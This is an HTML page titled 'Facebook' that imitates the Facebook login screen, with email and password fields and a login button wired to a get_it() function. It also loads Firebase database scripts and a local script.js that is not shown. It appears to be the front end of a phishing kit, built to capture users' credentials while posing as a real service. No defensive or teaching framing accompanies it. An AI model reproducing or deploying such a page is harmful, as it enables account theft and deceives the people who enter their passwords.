<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Facebook</title>
    <link rel="stylesheet" href="./style.css">
</head>
<body class="amine">
    <div id="hhhh">
    <div id="hole_thing">
        <div class="top">
            <span class="logo">facebook</span>
        </div>
        <div class="middle">
            <div class="input">
                <input type="text" id="email_field" class="in">
                <input type="password" id="password_field" class="in">
            </div>
        </div>
        <div class="login">
            <button class="in" id="press" onclick="get_it()">Log In</button>
        </div>
        <div class="bottem">
        </div>
    </div>
</div>
</body>
<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/7.0.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.0.0/firebase-database.js"></script>
<!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->
<script src="https://www.gstatic.com/firebasejs/7.0.0/firebase-analytics.js"></script>
<script src="./script.js"></script>
</html>